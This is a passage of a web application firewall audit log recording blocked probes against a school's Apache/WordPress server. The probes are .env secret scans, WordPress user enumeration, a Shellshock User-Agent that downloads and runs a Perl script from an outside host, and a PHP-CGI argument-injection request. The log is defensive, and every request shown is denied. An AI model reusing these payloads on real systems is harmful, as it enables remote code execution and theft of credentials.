phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749972890760087 878 (- - -) Stopwatch2: 1749972890760087 878; combined=382, p1=341, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a156401f-Z-- --8efba36e-A-- [15/Jun/2025:14:42:41 +0700] aE55cT2YoubFl106kA3WugAAAIM 103.236.140.4 38802 103.236.140.4 8181 --8efba36e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.166.188.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.166.188.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8efba36e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8efba36e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749973361544883 3437 (- - -) Stopwatch2: 1749973361544883 3437; combined=1530, p1=521, p2=976, p3=0, p4=0, p5=33, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8efba36e-Z-- --92e78f3a-A-- [15/Jun/2025:15:07:40 +0700] aE5_TLr7GPil_2h-MzYJ1AAAANY 103.236.140.4 39582 103.236.140.4 8181 --92e78f3a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; JSN-AL00a Build/HONORJSN-AL00a; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/1961 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --92e78f3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92e78f3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749974860521334 761 (- - -) Stopwatch2: 1749974860521334 761; combined=308, p1=269, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92e78f3a-Z-- --887c8407-A-- [15/Jun/2025:15:10:20 +0700] aE5_7Lr7GPil_2h-MzYJ1gAAAME 103.236.140.4 39620 103.236.140.4 8181 --887c8407-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.48.193.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.48.193.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --887c8407-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --887c8407-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749975020007429 2494 (- - -) Stopwatch2: 1749975020007429 2494; combined=1128, p1=353, p2=749, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --887c8407-Z-- --85e04060-A-- [15/Jun/2025:15:20:21 +0700] aE6CRYZIfYpKBvn-jB7NlgAAAFQ 103.236.140.4 39688 103.236.140.4 8181 --85e04060-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.179.100.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.179.100.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --85e04060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85e04060-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749975621826856 2284 (- - -) Stopwatch2: 1749975621826856 2284; combined=1255, p1=412, p2=814, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85e04060-Z-- --6116303e-A-- [15/Jun/2025:15:29:36 +0700] aE6EcIZIfYpKBvn-jB7PRQAAAFI 103.236.140.4 45858 103.236.140.4 8181 --6116303e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.204.187.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.204.187.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6116303e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6116303e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749976176347962 3292 (- - -) Stopwatch2: 1749976176347962 3292; combined=1440, p1=507, p2=905, p3=0, p4=0, p5=28, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6116303e-Z-- --4971e404-A-- [15/Jun/2025:16:12:48 +0700] aE6OkIZIfYpKBvn-jB7bRwAAAEI 103.236.140.4 37666 103.236.140.4 8181 --4971e404-B-- GET /nagios/cgi-bin/status.cgi HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.131.118.62 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.131.118.62 X-Forwarded-Proto: http Connection: close Accept: */* Accept-Language: en-us User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nZAZAZA"';system("wget -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif;curl -O /tmp/gif.gif http://pjsn.hi2.ro/gif.gif; lwp-download -a http://pjsn.hi2.ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit") --4971e404-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4971e404-H-- Message: Access denied with code 403 (phase 1). Pattern match "^(?:\\'\\w+?=)?\\(\\)\\s{" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749978768560732 898 (- - -) Stopwatch2: 1749978768560732 898; combined=394, p1=336, p2=0, p3=0, p4=0, p5=57, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4971e404-Z-- --01708033-A-- [15/Jun/2025:17:28:27 +0700] aE6gS_GguMGNwgSGIMxO9gAAAAA 103.236.140.4 51156 103.236.140.4 8181 --01708033-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36 Accept-Charset: utf-8 --01708033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01708033-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749983307689958 940 (- - -) Stopwatch2: 1749983307689958 940; combined=428, p1=385, p2=0, p3=0, p4=0, p5=43, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01708033-Z-- --5045fb69-A-- [15/Jun/2025:17:51:19 +0700] aE6lp_GguMGNwgSGIMxPCQAAAA0 103.236.140.4 51424 103.236.140.4 8181 --5045fb69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.78.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.78.73 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5045fb69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5045fb69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749984679684372 781 (- - -) Stopwatch2: 1749984679684372 781; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5045fb69-Z-- --108f864f-A-- [15/Jun/2025:18:02:59 +0700] aE6oY_GguMGNwgSGIMxPFgAAABY 103.236.140.4 51568 103.236.140.4 8181 --108f864f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.178.172.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.178.172.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --108f864f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --108f864f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749985379574264 3257 (- - -) Stopwatch2: 1749985379574264 3257; combined=1463, p1=476, p2=956, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --108f864f-Z-- --a200a203-A-- [15/Jun/2025:18:35:50 +0700] aE6wFrr7GPil_2h-MzY0tQAAAME 103.236.140.4 60644 103.236.140.4 8181 --a200a203-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.84.74.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.84.74.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a200a203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a200a203-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749987350431387 2741 (- - -) Stopwatch2: 1749987350431387 2741; combined=1170, p1=408, p2=727, p3=0, p4=0, p5=35, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a200a203-Z-- --c856db01-A-- [15/Jun/2025:19:01:09 +0700] aE62BT2YoubFl106kA3-dAAAAJA 103.236.140.4 33060 103.236.140.4 8181 --c856db01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.77.14.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.77.14.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c856db01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c856db01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749988869520032 2344 (- - -) Stopwatch2: 1749988869520032 2344; combined=1104, p1=356, p2=702, p3=0, p4=0, p5=45, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c856db01-Z-- --fad24265-A-- [15/Jun/2025:19:20:41 +0700] aE66mT2YoubFl106kA3-hQAAAIE 103.236.140.4 33132 103.236.140.4 8181 --fad24265-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.155.199 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept-Charset: utf-8 Cookie: X-Forwarded-For: 143.198.155.199 Accept-Encoding: gzip X-Varnish: 180665556 --fad24265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fad24265-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749990041862478 867 (- - -) Stopwatch2: 1749990041862478 867; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fad24265-Z-- --fdf14318-A-- [15/Jun/2025:19:25:23 +0700] aE67s_GguMGNwgSGIMxR-gAAABc 103.236.140.4 33140 103.236.140.4 8181 --fdf14318-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.133.213.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.133.213.86 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --fdf14318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdf14318-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749990323842614 834 (- - -) Stopwatch2: 1749990323842614 834; combined=318, p1=271, p2=0, p3=0, p4=0, p5=47, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdf14318-Z-- --71a2b544-A-- [15/Jun/2025:19:46:25 +0700] aE7AoT2YoubFl106kA3-mwAAAIA 103.236.140.4 33198 103.236.140.4 8181 --71a2b544-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.130.38.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.130.38.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71a2b544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71a2b544-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749991585874391 3243 (- - -) Stopwatch2: 1749991585874391 3243; combined=1307, p1=453, p2=819, p3=0, p4=0, p5=35, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71a2b544-Z-- --d243f93b-A-- [15/Jun/2025:20:27:53 +0700] aE7KWT2YoubFl106kA3-xAAAAJM 103.236.140.4 33496 103.236.140.4 8181 --d243f93b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --d243f93b-C-- --d243f93b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d243f93b-E-- --d243f93b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749994073449346 4999 (- - -) Stopwatch2: 1749994073449346 4999; combined=2945, p1=524, p2=2382, p3=0, p4=0, p5=39, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d243f93b-Z-- --addc2e2f-A-- [15/Jun/2025:20:48:13 +0700] aE7PHYZIfYpKBvn-jB754wAAAEI 103.236.140.4 33628 103.236.140.4 8181 --addc2e2f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.41.217.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.41.217.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --addc2e2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --addc2e2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749995293672491 2745 (- - -) Stopwatch2: 1749995293672491 2745; combined=1224, p1=412, p2=782, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --addc2e2f-Z-- --3e0e094a-A-- [15/Jun/2025:20:53:26 +0700] aE7QVrr7GPil_2h-MzY1VgAAANU 103.236.140.4 33694 103.236.140.4 8181 --3e0e094a-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; LG-D850 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.97 Mobile Safari/537.36 Accept-Charset: utf-8 --3e0e094a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e0e094a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri 